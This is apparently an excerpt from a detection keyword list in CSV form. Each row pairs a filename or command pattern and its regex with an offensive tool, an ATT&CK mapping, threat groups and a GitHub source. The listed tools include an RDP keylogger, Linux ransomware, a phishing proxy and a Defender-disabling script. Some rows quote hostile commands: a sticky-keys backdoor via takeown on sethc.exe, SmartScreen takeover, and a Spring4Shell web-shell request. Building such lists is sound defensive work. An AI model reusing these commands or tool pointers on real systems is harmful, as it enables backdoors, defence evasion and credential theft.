"*TailorScan_freebsd*",".{0,1000}TailorScan_freebsd.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60848"
"*TailorScan_linux_*",".{0,1000}TailorScan_linux_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","#linux","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60849"
"*TailorScan_netbsd_*",".{0,1000}TailorScan_netbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60850"
"*TailorScan_openbsd_*",".{0,1000}TailorScan_openbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60851"
"*TailorScan_windows_*.exe*",".{0,1000}TailorScan_windows_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60852"
"*TakahiroHaruyama/VDR*",".{0,1000}TakahiroHaruyama\/VDR.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","60883"
"*take_shellcode.bat*",".{0,1000}take_shellcode\.bat.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","60884"
"*TakeMyRDP*logfile.txt*",".{0,1000}TakeMyRDP.{0,1000}logfile\.txt.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60886"
"*TakeMyRDP.cpp*",".{0,1000}TakeMyRDP\.cpp.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60887"
"*TakeMyRDP.exe*",".{0,1000}TakeMyRDP\.exe.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60888"
"*TakeMyRDP.git*",".{0,1000}TakeMyRDP\.git.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60889"
"*TakeMyRDP.h*",".{0,1000}TakeMyRDP\.h.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60890"
"*TakeMyRDP.sln*",".{0,1000}TakeMyRDP\.sln.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60891"
"*TakeMyRDP.vcxproj*",".{0,1000}TakeMyRDP\.vcxproj.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60892"
"*TakeMyRDP2.0*",".{0,1000}TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60893"
"*TakeMyRDP-main*",".{0,1000}TakeMyRDP\-main.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60894"
"*takeown /f ""%systemroot%\System32\smartscreen.exe"" /a*",".{0,1000}takeown\s\/f\s\""\%systemroot\%\\System32\\smartscreen\.exe\""\s\/a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","60895"
"*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","60899"
"*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","60901"
"*TakeOwnershipServiceModificationVariant.exe*",".{0,1000}TakeOwnershipServiceModificationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","60902"
"*tanc7/EXOCET-AV-Evasion*",".{0,1000}tanc7\/EXOCET\-AV\-Evasion.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","60904"
"*Taonn/EmailAll*",".{0,1000}Taonn\/EmailAll.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","60905"
"*tarcisio_marinho09@hotmail.com*",".{0,1000}tarcisio_marinho09\@hotmail\.com.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#email #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","60906"
"*tarcisio-marinho/cryptomining*",".{0,1000}tarcisio\-marinho\/cryptomining.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","1","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","60907"
"*tarcisio-marinho/GonnaCry*",".{0,1000}tarcisio\-marinho\/GonnaCry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","1","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","60908"
"*target/debug/wstunnel*",".{0,1000}target\/debug\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60909"
"*target/tomcatwar.jsp?pwd=j&cmd=*",".{0,1000}target\/tomcatwar\.jsp\?pwd\=j\&cmd\=.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","60910"
"*target_reconftw_ipcidr.txt*",".{0,1000}target_reconftw_ipcidr\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","60911"
"*TARGET=evilginx*",".{0,1000}TARGET\=evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","60912"
"*targetedKerberoast.git*",".{0,1000}targetedKerberoast\.git.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60913"
"*targetedKerberoast.py*",".{0,1000}targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60914"
"*targetedkerberoast_attack*",".{0,1000}targetedkerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60915"
"*targetedkerberoast_hashes_*.txt*",".{0,1000}targetedkerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60916"
"*targetedkerberoast_output_*.txt*",".{0,1000}targetedkerberoast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60917"
"*targetedKerberoast-main*",".{0,1000}targetedKerberoast\-main.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60918"
"*TartarusGate-master*",".{0,1000}TartarusGate\-master.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","60919"
"*tarunkant/Gopherus*",".{0,1000}tarunkant\/Gopherus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60920"
"*tas389.ps1*",".{0,1000}tas389\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60921"
"*Tasked Beacon to escalate to SYSTEM*",".{0,1000}Tasked\sBeacon\sto\sescalate\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","N/A","10","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","60922"
"*taskkill /f /im rfusclient.exe*",".{0,1000}taskkill\s\/f\s\/im\srfusclient\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60948"
"*taskkill /f /im rutserv.exe*",".{0,1000}taskkill\s\/f\s\/im\srutserv\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60949"
"*taskkill /F /T /IM keepass.exe /FI*",".{0,1000}taskkill\s\/F\s\/T\s\/IM\skeepass\.exe\s\/FI.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","60958"
"*taskkill /IM tor.exe /F*",".{0,1000}taskkill\s\/IM\stor\.exe\s\/F.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","60997"
"*taskkill -f /im chfs.exe*",".{0,1000}taskkill\s\-f\s\/im\schfs\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61003"
